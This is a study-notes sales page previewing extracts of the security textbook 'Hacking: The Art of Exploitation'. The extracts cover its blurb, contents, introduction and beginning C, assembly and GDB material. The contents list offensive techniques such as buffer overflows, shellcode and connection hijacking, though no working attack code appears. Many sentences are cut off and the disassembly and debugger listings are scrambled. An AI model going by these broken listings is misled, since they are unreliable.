Search for notes by fellow students, in your own course and all over the country.

Browse our notes for titles which look like what you need, you can preview any of the notes via a sample of the contents. After you're happy these are the notes you're after simply pop them into your shopping cart.

My Basket

Buy These Notes

You have nothing in your shopping cart yet.

Title: Hacking The Art of Exploitation
Description: if you start to learn hacking this ebook might be helpful

Buy These Notes Preview

Document Preview

Extracts from the notes are below, to see the PDF you'll receive please use the links above

International Best-Seller!

the fundamental techniques of Serious hacking

j
Program computers using C, assembly language,
and shell scripts
j
Corrupt system memory to run arbitrary code
using buffer overflows and format strings

j
Crack encrypted wireless traffic using the FMS
attack, and speed up brute-force attacks using a
password probability matrix
Hackers are always pushing the boundaries, investigating the unknown, and evolving their art
...
Combine this knowledge with
the included Linux environment, and all you need is
your own creativity
...
He speaks at computer security conferences and trains security
teams around the world
...

j
Inspect processor registers and system memory
with a debugger to gain a real understanding of
what is happening

livecd provides a complete linux programming and debugging environment

T H E F I N E ST I N G E E K E N T E RTA I N M E N T ™

w w w
...
com

“I LAY FLAT
...

Printed on recycled paper

2nd Edition

j
Redirect network traffic, conceal open ports, and
hijack TCP connections

$49
...
95 cdn)
shelve in : computer security/network security

the art of exploitation

The included LiveCD provides a complete Linux
programming and debugging environment—all
without modifying your current operating system
...
Get your hands dirty
debugging code, overflowing buffers, hijacking
network communications, bypassing protections,
exploiting cryptographic weaknesses, and perhaps
even inventing new exploits
...
To share the art
and science of hacking in a way that is accessible
to everyone, Hacking: The Art of Exploitation, 2nd
Edition introduces the fundamentals of C programming from a hacker’s perspective
...
Many people call themselves
hackers, but few have the strong technical foundation needed to really push the envelope
...
Finally a book that does not
just show how to use the exploits but how to develop them
...
”
—SECURITY FORUMS
“I recommend this book for the programming section alone
...
It is written by someone who knows of what
he speaks, with usable code, tools and examples
...
”
—COMPUTER POWER USER (CPU) MAGAZINE
“This is an excellent book
...
”
—ABOUT
...
Copyright © 2008 by Jon Erickson
...
No part of this work may be reproduced or transmitted in any form or by any means, electronic or
mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior
written permission of the copyright owner and the publisher
...
directly:
No Starch Press, Inc
...
863
...
863
...
com; www
...
com
Librar y of Congress Cataloging-in-Publication Data
Erickson, Jon, 1977Hacking : the art of exploitation / Jon Erickson
...

p
...

ISBN-13: 978-1-59327-144-2
ISBN-10: 1-59327-144-1
1
...
2
...
3
...

QA76
...
A25E75 2008
005
...
Title
...
Other product and
company names mentioned herein may be the trademarks of their respective owners
...

The information in this book is distributed on an “As Is” basis, without warranty
...
shall have any liability to any
person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the
information contained in it
...
xi
Acknowledgments
...
1

0x200

Programming
...
115

0x400

Networking
...
281

0x600

Countermeasures
...
393

0x800

Conclusion
...
455

CONTENTS IN DETAIL
P R E F A CE

xi

A CK N O W LE D G M E N T S

xii

0x100

INTRODUCTION

1

0x200

PROGRAMMING

5

0x210
0x220
0x230

0x240

0x250

0x260

0x270

0x280

What Is Programming?
...
7
Control Structures
...
8
0x232 While/Until Loops
...
10
More Fundamental Programming Concepts
...
11
0x242 Arithmetic Operators
...
14
0x244 Functions
...
19
0x251 The Bigger Picture
...
23
0x253 Assembly Language
...
37
0x261 Strings
...
41
0x263 Pointers
...
48
0x265 Typecasting
...
58
0x267 Variable Scoping
...
69
0x271 Memory Segments in C
...
77
0x273 Error-Checked malloc()
...
81
0x281 File Access
...
87
0x283 User IDs
...
96
0x285 Function Pointers
...
101
0x287 A Game of Chance
...
118
Buffer Overflows
...
122
Experimenting with BASH
...
142
Overflows in Other Segments
...
150
0x342 Overflowing Function Pointers
...
167
0x351 Format Parameters
...
170
0x353 Reading from Arbitrary Memory Addresses
...
173
0x355 Direct Parameter Access
...
182
0x357 Detours with
...
184
0x358 Another notesearch Vulnerability
...
190

0x400
0x410
0x420

E X PL O I T A T I O N

N E T W O RK IN G

195

OSI Model
...
198
0x421 Socket Functions
...
200
0x423 Network Byte Order
...
203
0x425 A Simple Server Example
...
207
0x427 A Tinyweb Server
...
217
0x431 Data-Link Layer
...
220
0x433 Transport Layer
...
224
0x441 Raw Socket Sniffer
...
228
0x443 Decoding the Layers
...
239
Denial of Service
...
252
0x452 The Ping of Death
...
256
0x454 Ping Flooding
...
257
0x456 Distributed DoS Flooding
...
258
0x461 RST Hijacking
...
263

C on t en t s in D et ai l

0x470

0x480

Port Scanning
...
264
0x472 FIN, X-mas, and Null Scans
...
265
0x474 Idle Scanning
...
267
Reach Out and Hack Someone
...
273
0x482 Almost Only Counts with Hand Grenades
...
278

0x500
0x510
0x520

0x530

0x540

0x550

0x630
0x640
0x650

0x660

0x670
0x680

0x690

281

Assembly vs
...
282
0x511 Linux System Calls in Assembly
...
286
0x521 Assembly Instructions Using the Stack
...
289
0x523 Removing Null Bytes
...
295
0x531 A Matter of Privilege
...
302
Port-Binding Shellcode
...
307
0x542 Branching Control Structures
...
314

0x600
0x610
0x620

SH E L L CO D E

C O U N T E R M E AS U R E S

319

Countermeasures That Detect
...
321
0x621 Crash Course in Signals
...
324
Tools of the Trade
...
329
Log Files
...
334
Overlooking the Obvious
...
336
0x652 Putting Things Back Together Again
...
346
Advanced Camouflage
...
348
0x662 Logless Exploitation
...
354
0x671 Socket Reuse
...
359
0x681 String Encoding
...
362
Buffer Restrictions
...
366

C on t en ts in D et ail

ix

0x6a0
0x6b0

0x6c0

Hardening Countermeasures
...
376
0x6b1 ret2libc
...
377
Randomized Stack Space
...
380
0x6c2 Bouncing Off linux-gate
...
388
0x6c4 A First Attempt
...
390

0x700
0x710

0x720
0x730
0x740

0x750

0x760

0x770

0x780

C O N C LU S I O N

451

References
...
454

I ND E X

x

393

Information Theory
...
394
0x712 One-Time Pads
...
395
0x714 Computational Security
...
397
0x721 Asymptotic Notation
...
398
0x731 Lov Grover’s Quantum Search Algorithm
...
400
0x741 RSA
...
404
Hybrid Ciphers
...
406
0x752 Differing SSH Protocol Host Fingerprints
...
413
Password Cracking
...
419
0x762 Exhaustive Brute-Force Attacks
...
423
0x764 Password Probability Matrix
...
11b Encryption
...
434
0x772 RC4 Stream Cipher
...
436
0x781 Offline Brute-Force Attacks
...
437
0x783 IV-Based Decryption Dictionary Tables
...
438
0x785 Fluhrer, Mantin, and Shamir Attack
...
Understanding hacking techniques
is often difficult, since it requires both breadth and
depth of knowledge
...
This
second edition of Hacking: The Art of Exploitation makes the world of hacking
more accessible by providing the complete picture—from programming to
machine code to exploitation
...
This CD
contains all the source code in the book and provides a development and
exploitation environment you can use to follow along with the book’s
examples and experiment along the way
...
Also, I would like to thank my friends Seth Benson and Aaron Adams
for proofreading and editing, Jack Matheson for helping me with assembly,
Dr
...

0x100
INTRODUCTION

The idea of hacking may conjure stylized images of
electronic vandalism, espionage, dyed hair, and body
piercings
...
Granted, there are people out
there who use hacking techniques to break the law, but hacking isn’t really
about that
...

The essence of hacking is finding unintended or overlooked uses for the
laws and properties of a given situation and then applying them in new and
inventive ways to solve a problem—whatever it may be
...
Each number must be
used once and only once, and you may define the order of
operations; for example, 3 * (4 + 6) + 1 = 31 is valid, however
incorrect, since it doesn’t total 24
...
Like the solution to this problem (shown on the last page of
this book), hacked solutions follow the rules of the system, but they use those
rules in counterintuitive ways
...

Since the infancy of computers, hackers have been creatively solving
problems
...
The club’s members used this
equipment to rig up a complex system that allowed multiple operators to control different parts of the track by dialing in to the appropriate sections
...
The group moved on
to programming on punch cards and ticker tape for early computers like the
IBM 704 and the TX-0
...
A new program that could achieve the same result
as an existing one but used fewer punch cards was considered better, even
though it did the same thing
...

Being able to reduce the number of punch cards needed for a program
showed an artistic mastery over the computer
...
Early hackers proved that technical problems can have artistic solutions, and they thereby transformed programming from a mere engineering
task into an art form
...
The few
who got it formed an informal subculture that remained intensely focused
on learning and mastering their art
...
Such obstructions included authority figures, the bureaucracy of
college classes, and discrimination
...
This drive to continually learn and explore transcended
even the conventional boundaries drawn by discrimination, evident in the
MIT model railroad club’s acceptance of 12-year-old Peter Deutsch when
he demonstrated his knowledge of the TX-0 and his desire to learn
...

The original hackers found splendor and elegance in the conventionally
dry sciences of math and electronics
...
Their desire
to dissect and understand wasn’t intended to demystify artistic endeavors; it
was simply a way to achieve a greater appreciation of them
...
This is not a new cultural trend; the
Pythagoreans in ancient Greece had a similar ethic and subculture, despite
not owning computers
...
That thirst for knowledge and its beneficial byproducts would continue on through history, from the Pythagoreans to Ada
Lovelace to Alan Turing to the hackers of the MIT model railroad club
...

How does one distinguish between the good hackers who bring us the
wonders of technological advancement and the evil hackers who steal our
credit card numbers? The term cracker was coined to distinguish evil hackers
from the good ones
...
Hackers stayed true to the
Hacker Ethic, while crackers were only interested in breaking the law and
making a quick buck
...
Cracker was meant to be the
catch-all label for anyone doing anything unscrupulous with a computer—
pirating software, defacing websites, and worst of all, not understanding what
they were doing
...

The term’s lack of popularity might be due to its confusing etymology—
cracker originally described those who crack software copyrights and reverse
engineer copy-protection schemes
...

Few technology journalists feel compelled to use terms that most of their
readers are unfamiliar with
...
Similarly, the term script kiddie is sometimes used
to refer to crackers, but it just doesn’t have the same zing as the shadowy
hacker
...

The current laws restricting cryptography and cryptographic research
further blur the line between hackers and crackers
...

This paper responded to a challenge issued by the Secure Digital Music
Initiative (SDMI) in the SDMI Public Challenge, which encouraged the
public to attempt to break these watermarking schemes
...

The Digital Millennium Copyright Act (DCMA) of 1998 makes it illegal to
discuss or provide technology that might be used to bypass industry consumer controls
...
He had written software to circumvent
In t ro duc ti on

3

overly simplistic encryption in Adobe software and presented his findings at a
hacker convention in the United States
...
Under the law, the complexity of the
industry consumer controls doesn’t matter—it would be technically illegal to
reverse engineer or even discuss Pig Latin if it were used as an industry consumer control
...

The sciences of nuclear physics and biochemistry can be used to kill,
yet they also provide us with significant scientific advancement and modern
medicine
...
Even if we wanted to, we couldn’t suppress
the knowledge of how to convert matter into energy or stop the continued
technological progress of society
...
Hackers will
constantly be pushing the limits of knowledge and acceptable behavior,
forcing us to explore further and further
...
Just as the speedy gazelle adapted from being chased by the cheetah,
and the cheetah became even faster from chasing the gazelle, the competition between hackers provides computer users with better and stronger
security, as well as more complex and sophisticated attack techniques
...
The defending hackers create IDSs
to add to their arsenal, while the attacking hackers develop IDS-evasion
techniques, which are eventually compensated for in bigger and better IDS
products
...

The intent of this book is to teach you about the true spirit of hacking
...
Included with this book is
a bootable LiveCD containing all the source code used herein as well as a
preconfigured Linux environment
...
The only requirement is an x86 processor, which is used by all
Microsoft Windows machines and the newer Macintosh computers—just
insert the CD and reboot
...

This way, you will gain a hands-on understanding and appreciation for hacking
that may inspire you to improve upon existing techniques or even to invent
new ones
...

4

0x 100

0x200
PROGRAMMING

Hacker is a term for both those who write code and
those who exploit it
...
Since an understanding
of programming helps those who exploit, and an understanding of exploitation helps those who program, many
hackers do both
...

Hacking is really just the act of finding a clever and counterintuitive
solution to a problem
...
Programming hacks are
similar in that they also use the rules of the computer in new and inventive
ways, but the final goal is efficiency or smaller source code, not necessarily a
security compromise
...
The few solutions that remain
are small, efficient, and neat
...
Hackers on both sides of programming
appreciate both the beauty of elegant code and the ingenuity of clever hacks
...
Because of the
tremendous exponential growth of computational power and memory,
spending an extra five hours to create a slightly faster and more memoryefficient piece of code just doesn’t make business sense when dealing with
modern computers that have gigahertz of processing cycles and gigabytes of
memory
...
When the
bottom line is money, spending time on clever hacks for optimization just
doesn’t make sense
...
These are the people who get
excited about programming and really appreciate the beauty of an elegant
piece of code or the ingenuity of a clever hack
...

0x210

What Is Programming?
Programming is a very natural and intuitive concept
...
Programs are
everywhere, and even the technophobes of the world use programs every day
...
A typical program for driving directions might look something
like this:
Start out down Main Street headed east
...
If the street is blocked because of construction, turn
right there at 15th Street, turn left on Pine Street, and then turn right on
16th Street
...

Continue on 16th Street, and turn left onto Destination Road
...

The address is 743 Destination Road
...
Granted, they’re not eloquent,
but each instruction is clear and easy to understand, at least for someone
who reads English
...
To instruct a computer to do something, the instructions
must be written in its language
...
To write a program in machine language for an
Intel x86 processor, you would have to figure out the value associated with
each instruction, how each instruction interacts, and myriad low-level details
...

What’s needed to overcome the complication of writing machine language
is a translator
...

Assembly language is less cryptic than machine language, since it uses names
for the different instructions and variables, instead of just using numbers
...
The instruction names
are very esoteric, and the language is architecture specific
...
Any program written using assembly language for one processor’s
architecture will not work on another processor’s architecture
...
In addition, in order to write an effective program in assembly
language, you must still know many low-level details of the processor architecture you are writing for
...
A compiler converts a high-level language into machine language
...
This means that if a program is written in a highlevel language, the program only needs to be written once; the same piece of
program code can be compiled into machine language for various specific
architectures
...

A program written in a high-level language is much more readable and
English-like than assembly language or machine language, but it still must
follow very strict rules about how the instructions are worded, or the compiler won’t be able to understand it
...
Pseudo-code is simply English arranged with a general structure
similar to a high-level language
...
Pseudo-code isn’t well defined; in fact, most people write pseudo-code
slightly differently
...
Pseudo-code makes for an excellent introduction to common universal programming concepts
...
This is fine for very simple programs, but most
programs, like the driving directions example, aren’t that simple
...
These
statements are known as control structures, and they change the flow of the
program’s execution from a simple sequential order to a more complex and
more useful flow
...

If it is, a special set of instructions needs to address that situation
...
These types of special cases
can be accounted for in a program with one of the most natural control
structures: the if-then-else structure
...
The if-then-else pseudo-code structure of the preceding driving directions might look something like this:
Drive down Main Street;
If (street is blocked)
{
Turn right on 15th Street;
Turn left on Pine Street;
Turn right on 16th Street;
}
Else
{
Turn right on 16th Street;
}

Each instruction is on its own line, and the various sets of conditional
instructions are grouped between curly braces and indented for readability
...

8

0x 200

Of course, other languages require the then keyword in their syntax—
BASIC, Fortran, and even Pascal, for example
...
Once a programmer understands the concepts
these languages are trying to convey, learning the various syntactical variations is fairly trivial
...

Another common rule of C-like syntax is when a set of instructions
bounded by curly braces consists of just one instruction, the curly braces are
optional
...
The driving directions from
before can be rewritten following this rule to produce an equivalent piece of
pseudo-code:
Drive down Main Street;
If (street is blocked)
{
Turn right on 15th Street;
Turn left on Pine Street;
Turn right on 16th Street;
}
Else
Turn right on 16th Street;

This rule about sets of instructions holds true for all of the control
structures mentioned in this book, and the rule itself can be described in
pseudo-code
...
There are variations of if-then-else, such as select/case statements,
but the logic is still basically the same: If this happens do these things, otherwise
do these other things (which could consist of even more if-then statements)
...
A programmer will often want to execute a set of
instructions more than once
...
A while loop says to execute the following set of
instructions in a loop while a condition is true
...
The amount of food the mouse finds each
time could range from a tiny crumb to an entire loaf of bread
...

Another variation on the while loop is an until loop, a syntax that is
available in the programming language Perl (C doesn’t use this syntax)
...
The
same mouse program using an until loop would be:
Until (you are not hungry)
{
Find some food;
Eat the food;
}

Logically, any until-like statement can be converted into a while loop
...
This can easily be changed into a
standard while loop by simply inverting the condition
...
This is generally used when
a programmer wants to loop for a certain number of iterations
...
The same statement can be written as such:
Set the counter to 0;
While (the counter is less than 5)

10

0x200

{
Drive straight for 1 mile;
Add 1 to the counter;
}

The C-like pseudo-code syntax of a for loop makes this even more
apparent:
For (i=0; i<5; i++)
Drive straight for 1 mile;

In this case, the counter is called i, and the for statement is broken up
into three sections, separated by semicolons
...
The second section is like
a while statement using the counter: While the counter meets this condition,
keep looping
...
In this case, i++ is a shorthand
way of saying, Add 1 to the counter called i
...
These concepts are used in many programming languages, with
a few syntactical differences
...
By the end, the pseudocode should look very similar to C code
...
A variable can
simply be thought of as an object that holds data that can be changed—
hence the name
...
Returning to the driving example, the speed of the car would
be a variable, while the color of the car would be a constant
...
This is because a C program will eventually be compiled into an executable program
...
Ultimately, all variables
are stored in memory somewhere, and their declarations allow the compiler
to organize this memory more efficiently
...

In C, each variable is given a type that describes the information that is
meant to be stored in that variable
...
Variables are declared simply by using these keywords before
listing the variables, as you can see below
...
14), and z is expected to hold a character value, like A
or w
...

int a = 13, b;
float k;
char z = 'A';
k = 3
...
14, z will contain the character w,
and b will contain the value 18, since 13 plus 5 equals 18
...

0x242

Arithmetic Operators

The statement b = a + 7 is an example of a very simple arithmetic operator
...

The first four operations should look familiar
...
If a is 13, then 13 divided by 5 equals 2, with a remainder of 3, which
means that a % 5 = 3
...
Floating-point variables must be used to retain the
more correct answer of 2
...

Operation

Symbol

Example

Addition

+

b = a + 5

Subtraction

-

b = a - 5

Multiplication

*

b = a * 5

Division

/

b = a / 5

Modulo reduction

%

b = a % 5

To get a program to use these concepts, you must speak its language
...
One of these was mentioned earlier and is used commonly in for loops
...

i = i - 1

i-- or --i

Subtract 1 from the variable
...
This is where the difference between i++ and ++i becomes apparent
...
The following example will help clarify
...

P rog ra m min g

13

Quite often in programs, variables need to be modified in place
...
This
happens commonly enough that shorthand also exists for it
...

i = i - 12

i-=12

Subtract some value from the variable
...

i = i / 12

i/=12

Divide some value from the variable
...
These conditional statements are based on some
sort of comparison
...

Condition

Symbol

Example

Less than

<

(a < b)

Greater than

>

(a > b)

Less than or equal to

<=

(a <= b)

Greater than or equal to

>=

(a >= b)

Equal to

==

(a == b)

Not equal to

!=

(a != b)

Most of these operators are self-explanatory; however, notice that the
shorthand for equal to uses double equal signs
...
The statement a = 7 means
Put the value 7 in the variable a, while a == 7 means Check to see whether the variable
a is equal to 7
...
) Also, notice that an
exclamation point generally means not
...

!(a < b)

is equivalent to

(a >= b)

These comparison operators can also be chained together using shorthand for OR and AND
...
Similarly,
the example statement consisting of two smaller comparisons joined with
AND logic will fire true if a is less than b AND a is not less than c
...

Many things can be boiled down to variables, comparison operators, and
control structures
...
Naturally, 1
means true and 0 means false
...
C doesn’t really have any Boolean operators, so any nonzero value is
considered true, and a statement is considered false if it contains 0
...
Checking to see whether the variable hungry
is equal to 1 will return 1 if hungry equals 1 and 0 if hungry equals 0
...

While (hungry)
{
Find some food;
Eat the food;
}

A smarter mouse program with more inputs demonstrates how comparison operators can be combined with variables
...

Just remember that any nonzero value is considered true, and the value of 0
is considered false
...
These instructions can be grouped into a smaller subprogram called a function
...
For example, the action of turning a car actually
consists of many smaller instructions: Turn on the appropriate blinker, slow
down, check for oncoming traffic, turn the steering wheel in the appropriate
direction, and so on
...
You can pass variables as arguments
to a function in order to modify the way the function operates
...

Function Turn(variable_direction)
{
Activate the variable_direction blinker;
Slow down;
Check for oncoming traffic;
while(there is oncoming traffic)
{
Stop;
Watch for oncoming traffic;
}
Turn the steering wheel to the variable_direction;
while(turn is not complete)
{
if(speed < 5 mph)
Accelerate;
}
Turn the steering wheel back to the original position;
Turn off the variable_direction blinker;
}

This function describes all the instructions needed to make a turn
...
When the function is called, the instructions found within it are
executed with the arguments passed to it; afterward, execution returns to
where it was in the program, after the function call
...

By default in C, functions can return a value to a caller
...
Imagine a
function that calculates the factorial of a number—naturally, it returns the
result
...
This format
looks very similar to variable declaration
...
The return statement
at the end of the function passes back the contents of the variable x and ends
the function
...

int a=5, b;
b = factorial(a);

At the end of this short program, the variable b will contain 120, since
the factorial function will be called with the argument of 5 and will return 120
...
This can be done by simply writing the entire function before using it
later in the program or by using function prototypes
...
The actual
function can be located near the end of the program, but it can be used anywhere else, since the compiler already knows about it
...

There’s no need to actually define any variable names in the prototype, since
this is done in the actual function
...

If a function doesn’t have any value to return, it should be declared as void,
as is the case with the turn() function I used as an example earlier
...
Every turn in the directions has both a direction and a street
name
...
This complicates the function
of turning, since the proper street must be located before the turn can be
made
...

P rog ra m min g

17

void turn(variable_direction, target_street_name)
{
Look for a street sign;
current_intersection_name = read street sign name;
while(current_intersection_name != target_street_name)
{
Look for another street sign;
current_intersection_name = read street sign name;
}
Activate the variable_direction blinker;
Slow down;
Check for oncoming traffic;
while(there is oncoming traffic)
{
Stop;
Watch for oncoming traffic;
}
Turn the steering wheel to the variable_direction;
while(turn is not complete)
{
if(speed < 5 mph)
Accelerate;
}
Turn the steering wheel right back to the original position;
Turn off the variable_direction blinker;
}

This function includes a section that searches for the proper intersection
by looking for street signs, reading the name on each street sign, and storing
that name in a variable called current_intersection_name
...
The pseudo-code driving
instructions can now be changed to use this turning function
...
Since pseudo-code doesn’t actually have to work,
full functions don’t need to be written out—simply jotting down Do some
complex stuff here will suffice
...
Most of the real usefulness of C comes from collections of
existing functions called libraries
...
C compilers exist for just about every operating system and processor
architecture out there, but for this book, Linux and an x 86-based processor
will be used exclusively
...
Since hacking is really about experimenting, it’s
probably best if you have a C compiler to follow along with
...
Just put the CD in the drive and reboot
your computer
...
From this Linux environment you can follow
along with the book and experiment on your own
...
The firstprog
...

firstprog
...
h>
int main()
{
int i;
for(i=0; i < 10; i++)
{
puts("Hello, world!\n");
}
return 0;
}

// Loop 10 times
...

// Tell OS the program exited without errors
...
Any text following two forward slashes (//) is a comment, which is
ignored by the compiler
...
This header file is added to the program when it is compiled
...
h, and it defines several constants and function prototypes for corresponding functions in the standard I/O library
...

This function prototype (along with many others) is included in the stdio
...
A lot of the power of C comes from its extensibility and libraries
...
You may have even noticed that there’s a set of curly braces that
can be eliminated
...

The GNU Compiler Collection (GCC) is a free C compiler that translates C
into machine language that a processor can understand
...
out by default
...
c
ls -l a
...
out

...
out

The Bigger Picture

Okay, this has all been stuff you would learn in an elementary programming
class—basic, but essential
...
Don’t get me wrong, being fluent in C is very useful
and is enough to make you a decent programmer, but it’s only a piece of the
bigger picture
...
Hackers get their edge from knowing how all
the pieces interact within this bigger picture
...

The code can’t actually do anything until it’s compiled into an executable
binary file
...
The binary a
...
Compilers are designed to translate the language of C code into machine
language for a variety of processor architectures
...
There are also Sparc processor
architectures (used in Sun Workstations) and the PowerPC processor architecture (used in pre-Intel Macs)
...

20

0x200

As long as the compiled program works, the average programmer is
only concerned with source code
...
With a better
understanding of how the CPU operates, a hacker can manipulate the programs that run on it
...
But what does
this executable binary look like? The GNU development tools include a program called objdump, which can be used to examine compiled binaries
...

reader@hacking:~/booksrc
08048374

:
8048374:
55
8048375:
89 e5
8048377:
83 ec 08
804837a:
83 e4 f0
804837d:
b8 00 00
8048382:
29 c4
8048384:
c7 45 fc
804838b:
83 7d fc
804838f:
7e 02
8048391:
eb 13
8048393:
c7 04 24
804839a:
e8 01 ff
804839f:
8d 45 fc
80483a2:
ff 00
80483a4:
eb e5
80483a6:
c9
80483a7:
c3
80483a8:
90
80483a9:
90
80483aa:
90
reader@hacking:~/booksrc

$ objdump -D a
...
:

00 00
00 00 00 00
09

84 84 04 08
ff ff

push
mov
sub
and
mov
sub
movl
cmpl
jle
jmp
movl
call
lea
incl
jmp
leave
ret
nop
nop
nop

%ebp
%esp,%ebp
$0x8,%esp
$0xfffffff0,%esp
$0x0,%eax
%eax,%esp
$0x0,0xfffffffc(%ebp)
$0x9,0xfffffffc(%ebp)
8048393
80483a6
$0x8048484,(%esp)
80482a0
0xfffffffc(%ebp),%eax
(%eax)
804838b

$

The objdump program will spit out far too many lines of output to
sensibly examine, so the output is piped into grep with the command-line
option to only display 20 lines after the regular expression main
...
The
numbering system you are most familiar with uses a base-10 system, since at
10 you need to add an extra symbol
...
This is a convenient notation since a byte contains 8 bits, each
of which can be either true or false
...

The hexadecimal numbers—starting with 0x8048374 on the far left—are
memory addresses
...
Memory is just a
collection of bytes of temporary storage space that are numbered with
addresses
...
Each
byte of memory can be accessed by its address, and in this case the CPU
accesses this part of memory to retrieve the machine language instructions
that make up the compiled program
...
The 32-bit processors
have 232 (or 4,294,967,296) possible addresses, while the 64-bit ones have 264
(1
...
The 64-bit processors can run in
32-bit compatibility mode, which allows them to run 32-bit code quickly
...
Of course, these hexadecimal values
are only representations of the bytes of binary 1s and 0s the CPU can understand
...

isn’t very useful to anything other than the processor, the machine code is
displayed as hexadecimal bytes and each instruction is put on its own line,
like splitting a paragraph into sentences
...
The instructions on
the far right are in assembly language
...

The instruction ret is far easier to remember and make sense of than 0xc3 or
11000011
...
This means that since every processor architecture has
different machine language instructions, each also has a different form of
assembly language
...
Exactly how
these machine language instructions are represented is simply a matter of
convention and preference
...
The assembly shown in the output on page 21
is AT&T syntax, as just about all of Linux’s disassembly tools use this syntax by
default
...
The same
code can be shown in Intel syntax by providing an additional command-line
option, -M intel, to objdump, as shown in the output below
...
out | grep -A20 main
...

Regardless of the assembly language representation, the commands a processor understands are quite simple
...
These operations move memory
around, perform some sort of basic math, or interrupt the processor to get it
to do something else
...
But in the same way millions of books have been written using a relatively
small alphabet of letters, an infinite number of possible programs can be
created using a relatively small collection of machine instructions
...
Most
of the instructions use these registers to read or write data, so understanding
the registers of a processor is essential to understanding the instructions
...

0x252

The x86 Processor

The 8086 CPU was the first x86 processor
...
If you remember people talking
about 386 and 486 processors in the ’80s and ’90s, this is what they were
referring to
...
I could just talk abstractly about these registers now, but
I think it’s always better to see things for yourself
...
Debuggers are used by programmers to step through compiled programs, examine program memory, and
view processor registers
...
Similar to a microscope, a debugger allows
a hacker to observe the microscopic world of machine code—but a debugger is
far more powerful than this metaphor allows
...

P rog ra m min g

23

Below, GDB is used to show the state of the processor registers right before
the program starts
...
/a
...
so
...

(gdb) break main
Breakpoint 1 at 0x804837a
(gdb) run
Starting program: /home/reader/booksrc/a
...
Exit anyway? (y or n) y
reader@hacking:~/booksrc $

A breakpoint is set on the main() function so execution will stop right
before our code is executed
...

The first four registers (EAX, ECX, EDX, and EBX) are known as generalpurpose registers
...
They are used for a variety of purposes, but they mainly
act as temporary variables for the CPU when it is executing machine
instructions
...

These stand for Stack Pointer, Base Pointer, Source Index, and Destination Index,
respectively
...
These registers
are fairly important to program execution and memory management; we will
discuss them more later
...
There are load and store instructions
that use these registers, but for the most part, these registers can be thought
of as just simple general-purpose registers
...
Like a child pointing his finger
at each word as he reads, the processor reads each instruction using the EIP
register as its finger
...
Currently, it points to a memory address at 0x804838a
...
The actual memory is
split into several different segments, which will be discussed later, and these
registers keep track of that
...

0x253

Assembly Language

Since we are using Intel syntax assembly language for this book, our tools
must be configured to use this syntax
...
You can configure this setting to run every time GDB starts up by
putting the command in the file
...

reader@hacking:~/booksrc
(gdb) set dis intel
(gdb) quit
reader@hacking:~/booksrc
reader@hacking:~/booksrc
set dis intel
reader@hacking:~/booksrc

$ gdb -q

$ echo "set dis intel" > ~/
...
gdbinit
$

Now that GDB is configured to use Intel syntax, let’s begin understanding
it
...
The operations are usually intuitive mnemonics: The mov
operation will move a value from the source to the destination, sub will
subtract, inc will increment, and so forth
...

8048375:
8048377:

89 e5
83 ec 08

mov
sub

ebp,esp
esp,0x8

P rog ra m min g

25

There are also operations that are used to control the flow of execution
...
The example below first compares a 4-byte
value located at EBP minus 4 with the number 9
...
If that value is less than or equal to 9, execution jumps to the
instruction at 0x8048393
...
If the value isn’t less than or equal to 9, execution will jump to 0x80483a6
...

The -g flag can be used by the GCC compiler to include extra debugging
information, which will give GDB access to the source code
...
c
reader@hacking:~/booksrc $ ls -l a
...
out
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/libthread_db
...
1"
...
h>
2
3
int main()
4
{
5
int i;
6
for(i=0; i < 10; i++)
7
{
8
printf("Hello, world!\n");
9
}
10
}
(gdb) disassemble main
Dump of assembler code for function main():
0x08048384 :
push
ebp
0x08048385 :
mov
ebp,esp
0x08048387 :
sub
esp,0x8
0x0804838a :
and
esp,0xfffffff0
0x0804838d :
mov
eax,0x0
0x08048392 :
sub
esp,eax
0x08048394 :
mov
DWORD PTR [ebp-4],0x0
0x0804839b :
cmp
DWORD PTR [ebp-4],0x9
0x0804839f :
jle
0x80483a3
0x080483a1 :
jmp
0x80483b6

26

0x200

0x080483a3 :
mov
DWORD PTR [esp],0x80484d4
0x080483aa :
call
0x80482a8 <_init+56>
0x080483af :
lea
eax,[ebp-4]
0x080483b2 :
inc
DWORD PTR [eax]
0x080483b4 :
jmp
0x804839b
0x080483b6 :
leave
0x080483b7 :
ret
End of assembler dump
...
c, line 6
...
out
Breakpoint 1, main() at firstprog
...
Then a breakpoint is set at the start of main(), and the program is
run
...
Since the breakpoint has been set at the
start of the main() function, the program hits the breakpoint and pauses
before actually executing any instructions in main()
...

Notice that EIP contains a memory address that points to an instruction in
the main() function’s disassembly (shown in bold)
...
Part of the reason variables need to be declared in C is to aid
the construction of this section of code
...
We’ll talk
more about the function prologue later, but for now we can take a cue from
GDB and skip it
...
Examining memory is a critical
skill for any hacker
...
In both magic and hacking, if you were to look in just the right
spot, the trick would be obvious
...
But with a debugger like GDB, every aspect
of a program’s execution can be deterministically examined, paused, stepped
through, and repeated as often as needed
...

The examine command in GDB can be used to look at a certain address
of memory in a variety of ways
...

P rog ra m min g

27

The display format also uses a single-letter shorthand, which is optionally
preceded by a count of how many items to examine
...

x

Display in hexadecimal
...

t

Display in binary
...
In the following example, the current address of the EIP
register is used
...

(gdb) i r
eip
(gdb) x/o
0x8048384
(gdb) x/x
0x8048384
(gdb) x/u
0x8048384
(gdb) x/t
0x8048384
(gdb)

eip
0x8048384
0x8048384
0x8048384
:
077042707
$eip
:
0x00fc45c7
$eip
:
16532935
$eip
:
00000000111111000100010111000111

The memory the EIP register is pointing to can be examined by using the
address stored in EIP
...
The value 077042707 in
octal is the same as 0x00fc45c7 in hexadecimal, which is the same as 16532935 in
base-10 decimal, which in turn is the same as 00000000111111000100010111000111
in binary
...

(gdb) x/2x $eip
0x8048384 :
(gdb) x/12x $eip
0x8048384 :
0x8048394 :
0x80483a4 :
(gdb)

0x00fc45c7

0x83000000

0x00fc45c7
0x84842404
0xc3c9e5eb

0x83000000
0x01e80804
0x90909090

0x7e09fc7d
0x8dffffff
0x90909090

0xc713eb02
0x00fffc45
0x5de58955

The default size of a single unit is a four-byte unit called a word
...
The valid size letters are as follows:
b
h

A word, which is four bytes in size

g
0x200

A halfword, which is two bytes in size

w

28

A single byte

A giant, which is eight bytes in size

This is slightly confusing, because sometimes the term word also refers to
2-byte values
...
In this
book, words and DWORDs both refer to 4-byte values
...
The following GDB output shows
memory displayed in various sizes
...

The first e xamine command shows the first eight bytes, and naturally, the
examine commands that use bigger units display more data in total
...
This same byte-reversal effect can be seen
